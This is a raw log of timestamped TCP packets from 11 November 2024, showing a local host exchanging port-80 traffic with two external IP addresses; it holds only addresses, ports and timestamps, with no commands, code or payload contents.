                                                                                                                                                Nov 11, 2024 19:16:48.205519915 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.205528975 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.205547094 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.205554962 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.205562115 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.205569029 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.205581903 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.205595016 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.205619097 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.206418037 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.206430912 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.206440926 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.206458092 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.206470013 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.206480980 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.206490993 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.206494093 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.206507921 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.206516027 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.206520081 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.206542969 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.206564903 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.207350969 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.207362890 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.207376003 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.207386971 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.207398891 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.207401991 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.207411051 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.207425117 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.207436085 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.207442045 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.207442045 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.207473040 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.208205938 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.208220005 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.208230972 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.208242893 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.208255053 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.208264112 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.208271980 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.208282948 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.208311081 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.211066008 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.211330891 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:50.129076004 CET4973280192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:50.134061098 CET804973277.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:50.134182930 CET4973280192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:50.134290934 CET4973280192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:50.143879890 CET804973277.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:50.157502890 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:50.162523985 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:50.162641048 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:50.162796974 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:50.167634010 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:50.185750961 CET804973277.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:50.185930014 CET4973280192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:50.806740046 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:50.806777954 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:50.806790113 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:50.806826115 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:50.806838036 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:50.806849957 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:50.806844950 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:50.806957960 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:50.806957960 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:50.807060957 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:50.807073116 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:50.807085991 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:50.807121038 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:50.807360888 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:50.807404995 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:50.811742067 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:50.811819077 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:50.811831951 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:50.811868906 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:50.812000990 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:50.812057018 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:50.912008047 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:50.912056923 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:50.912070990 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:50.912120104 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:50.912175894 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:50.912250042 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:50.912272930 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:50.912431955 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:50.912442923 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:50.912453890 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:50.912477016 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:50.912508011 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:50.912781000 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:50.912796021 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:50.912869930 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:50.913141966 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:50.913285017 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:50.913296938 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:50.913350105 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:50.913558006 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:50.913618088 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:50.913746119 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:50.913758039 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:50.913824081 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:50.913908005 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:50.913995028 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:50.914006948 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:50.914035082 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:50.914258003 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:50.914271116 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:50.914283037 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:50.914308071 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:50.914346933 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:50.914870024 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:50.914935112 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:50.914985895 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:50.916975021 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:50.971869946 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:50.992889881 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.017949104 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.017996073 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.018008947 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.018028975 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.018040895 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.018054962 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.018284082 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.018300056 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.018315077 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.018326998 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.018388033 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.018448114 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.018621922 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.018663883 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.018784046 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.018796921 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.018846989 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.018974066 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.018985033 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.018997908 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.019022942 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.019268036 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.019335032 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.019370079 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.019382000 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.019423008 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.019660950 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.019671917 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.019682884 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.019709110 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.019872904 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.019936085 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.020268917 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.020282030 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.020292997 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.020303965 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.020315886 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.020328045 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.020328045 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.020347118 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.020381927 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.020674944 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.020759106 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.020806074 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.020898104 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.020910025 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.020955086 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.021303892 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.021315098 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.021325111 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.021337032 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.021351099 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.021382093 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.021533012 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.021656036 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.021687031 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.021697998 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.021749973 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.021917105 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.021944046 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.021959066 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.021971941 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.021984100 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.022015095 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.022428036 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.022456884 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.023238897 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.023287058 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.023292065 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.023304939 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.023343086 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.058948040 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.059092999 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:51.059238911 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:51.064245939 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.098685026 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.098704100 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.098808050 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.123431921 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.123486996 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.123495102 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.123626947 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.123646975 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.123698950 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.123790026 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.123804092 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.123815060 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.123827934 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.123852015 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.123886108 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.124273062 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.124284983 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.124296904 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.124310017 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.124320984 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.124321938 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.124337912 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.124351978 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.124351025 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.124365091 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.124397993 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.124420881 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.125252008 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.125264883 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.125274897 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.125288010 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.125299931 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.125310898 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.125313997 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.125322104 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.125332117 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.125334978 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.125346899 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.125359058 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.125360966 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.125381947 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.125401020 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.126177073 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.126188993 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.126198053 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.126209021 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.126219988 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.126230955 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.126231909 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.126244068 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.126250029 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.126259089 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.126271963 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.126281977 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.126321077 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.127137899 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.127151966 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.127161980 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.127171993 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.127185106 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.127192020 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.127196074 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.127202034 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.127219915 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.127228022 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.127228022 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.127232075 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.127245903 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.127252102 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.127285957 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.128087997 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.128101110 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.128110886 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.128123045 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.128133059 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.128137112 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.128149986 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.128155947 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.128165007 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.128176928 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.128189087 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.128191948 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.128209114 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.128247976 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.128973007 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.128987074 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.128997087 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.129009008 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.129021883 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.129049063 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.129081011 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.129407883 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.129420996 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.129432917 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.129445076 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.129456043 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.129456997 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.129487038 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.129517078 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.129853964 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.129864931 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.129879951 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.129890919 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.129900932 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.129901886 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.129914045 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.129925966 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.129937887 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.129937887 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.129951000 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.129956961 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.129968882 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.129987955 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.130013943 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.130646944 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.130659103 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.130671024 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.130682945 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.130693913 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.130707979 CET4973380192.168.2.477.105.36.123
